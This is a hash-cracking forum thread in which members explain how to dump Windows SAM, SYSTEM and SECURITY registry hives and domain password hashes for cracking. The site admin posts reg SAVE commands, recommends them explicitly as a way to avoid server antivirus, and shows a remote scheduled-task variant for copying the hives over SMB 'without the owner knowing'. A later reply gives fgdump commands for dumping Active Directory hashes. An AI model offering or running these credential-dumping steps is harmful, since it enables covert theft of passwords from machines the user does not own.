NOTE: When cracking WPA/WPA2 passwords, make sure you check gpuhash.me first incase it's already been processed.

Home - General Discussion - Manually save SAM SYSTEM registry hives


9 Results - Page 1 of 1 -
1
Author Message
Avatar
blandyuk
Admin / Owner
Status: Trusted
Joined: Tue, 05 Jul 2011
Posts: 3033
Team: HashKiller
Reputation: 4060 Reputation
Offline
Wed, 12 Oct 2011 @ 10:21:26

Been wanting to know how to do this for ages, without using pwdump OR SAMInside OR Cain & Able etc. Here is how it's done:

You need to use a user who is in the "Administrators" group OR you can create a Schedule Task and run it as the "SYSTEM" user and run the following from cmd.exe

reg SAVE HKLM\SAM [drive]:\sam.hive
reg SAVE HKLM\SYSTEM [drive]:\system.hive

Once done, use whatever, SAM Inside, Cain & Able, to load hashes and crack em.

Q). Why would you want to do this way?
A). Most server Anti-Virus programs are locked out even thou your in the "Administrators" group, meaning your nice "pwdump" programs will get removed instantly. This way does mean you can get the 2 hives, without the AV software interferring


Please read the forum rules | Please read the paid section rules
I accept private hash lists, with forum donations only.
BTC: 15qF9WUeFUD63ishxyAMiEgGqTcYzk4j9b
GPU Power: 9x GTX 1070 + 4x GTX 1080

Avatar
blandyuk
Admin / Owner
Status: Trusted
Joined: Tue, 05 Jul 2011
Posts: 3033
Team: HashKiller
Reputation: 4060 Reputation
Offline
Wed, 12 Oct 2011 @ 10:22:19

Update on this, to get the Domain Cache logins:

reg SAVE HKLM\SECURITY [drive]:\security.hive
reg SAVE HKLM\SYSTEM [drive]:\system.hive

With WinXP, you'll get "Access Denied" on the HKLM\SECURITY hive, to get round this, type this in at command-line:

at 15:00 reg SAVE HKLM\SECURITY [drive]:\security.hive

Note: the 15:00 is the time, please change as neccessary. This will create a windows schedule and use the [machine]\SYSTEM user to run it which has access. You can also run this remotely on another machine as long as you have local administrator access. Simply run:

at \\[machine] 15:00 reg SAVE HKLM\SECURITY [drive]:\security.hive

This will save the reg files locally on the \\[machine]] so you can simply SMB on and get them without the owner knowing.


Please read the forum rules | Please read the paid section rules
I accept private hash lists, with forum donations only.
BTC: 15qF9WUeFUD63ishxyAMiEgGqTcYzk4j9b
GPU Power: 9x GTX 1070 + 4x GTX 1080

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 3003 Reputation
Offline
Mon, 23 Jan 2012 @ 16:47:44

Thank you for posting this Blandy it’s useful stuff !

XP Pro

I have managed to crack my own computer using the method where I copy the files from my local running C drive.

C:\WINDOWS\system32\config\SAM
C:\WINDOWS\system32\config\SYSTEM


Server 2003.

In another test I loaded a server up, (Server 2003) and performed the same as above. However I noticed that I only have my own administrator user name and password in the SAM + SYSTEM files and not the “test” user I had made on the domain.

Do you know how I can do this when I physically have the drive on my desk ? I would like to be able to copy all usernames and password hashes from a slave drive (ghost image of the actual server C drive) connected to my computer.

Separate question.
Would I be able to do this via a LAN connection also ? I have the Administrator password obviously as it is my domain, but I wondered if it is possible to copy all domain user names and password hashes with or without using remote desktop from a computer on the LAN ?

Thank you very much.

Normal 0 false false false MicrosoftInternetExplorer4


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
blandyuk
Admin / Owner
Status: Trusted
Joined: Tue, 05 Jul 2011
Posts: 3033
Team: HashKiller
Reputation: 4060 Reputation
Offline
Mon, 23 Jan 2012 @ 17:21:50

You cannot get a full list of Active Directory users on a Domain this way, only way is to either do a pwdump on the shared drive on the domain network OR crack the Domain Cache Cred logins on a computer that is used by users, (Windows stores the last 10 domain users and passwords as DCC hashes).

-
edited by blandyuk on 07/01/2013


Please read the forum rules | Please read the paid section rules
I accept private hash lists, with forum donations only.
BTC: 15qF9WUeFUD63ishxyAMiEgGqTcYzk4j9b
GPU Power: 9x GTX 1070 + 4x GTX 1080

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 3003 Reputation
Offline
Mon, 23 Jan 2012 @ 17:37:15

Thank you for taking the time to write back, I am sorry I don’t understand.

Are you saying that I cannot extract the domain usernames and password hashes directly from a verbatim copy of my server C drive connected to my computer as a slave drive ?

Surly server has to store the details somewhere ?

Thanks.


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hasheponge

Status: Elite
Joined: Fri, 16 Dec 2011
Posts: 1671
Team:
Reputation: 1128 Reputation
Offline
Mon, 23 Jan 2012 @ 18:18:46

Hash-IT said:

Thank you for taking the time to write back, I am sorry I don’t understand.

Are you saying that I cannot extract the domain usernames and password hashes directly from a verbatim copy of my server C drive connected to my computer as a slave drive ?

Surly server has to store the details somewhere ?

Thanks.

You can only extract "cache persistent" (if GPO of domain AD is ok) in your server, but full list of Active Directory users not easy.... use a sniffing and try downgrade to LM&NTLMv1 authentification is possible...


Specs -
Nvidia 660 Ti - 470 GTX - Radeon 6950

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 3003 Reputation
Offline
Mon, 23 Jan 2012 @ 18:30:00

Thanks hasheponge for your help.

I am amazed that this is not possible, I wonder where the usernames and hashes are stored then if not on the C drive of the server !

If I boot this copy of the C drive up in a different computer I can log in as admin and see all the users there. I am completely baffled ! Ha ha !

Is it all locked down and encrypted or something when server 2003 shuts down ?


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hasheponge

Status: Elite
Joined: Fri, 16 Dec 2011
Posts: 1671
Team:
Reputation: 1128 Reputation
Offline
Tue, 24 Jan 2012 @ 10:27:44

Hash-IT said:

Thanks hasheponge for your help.

I am amazed that this is not possible, I wonder where the usernames and hashes are stored then if not on the C drive of the server ! ==> in database on DC (domain controler) see : http://en.wikipedia.org/wiki/Active_Directory#Database

If I boot this copy of the C drive up in a different computer I can log in as admin and see all the users there. I am completely baffled ! Ha ha ! ==> lol ;-)

Is it all locked down and encrypted or something when server 2003 shuts down ?


For Attack AD 2003 see :

0 - But you must login with admin domain...

1 - download fgdump


2 - execute :

fgdump.exe -h ServerAD -u AdminDomain -p passadmindomain

3 - then you extract a file : ServerAD.pwdump ==> Hash is MD5 inside this file...

Code:
4 - Try to crack ;-)

<em>edited by hasheponge on 24/01/2012</em>


Specs -
Nvidia 660 Ti - 470 GTX - Radeon 6950

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 3003 Reputation
Offline
Tue, 24 Jan 2012 @ 22:28:57

Thanks hasheponge

I got reading that link you kindly supplied me and the program also and completly lost track of time. So I haven't long to write just now but I just wanted to say thank you for posting and setting me off in the right direction !

I will most likely come back later !! Ha ha !


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E


9 Results - Page 1 of 1 -
1

We have a total of 163304 messages in 20501 topics.
We have a total of 19269 registered users.
Our newest registered member is WilliamNit.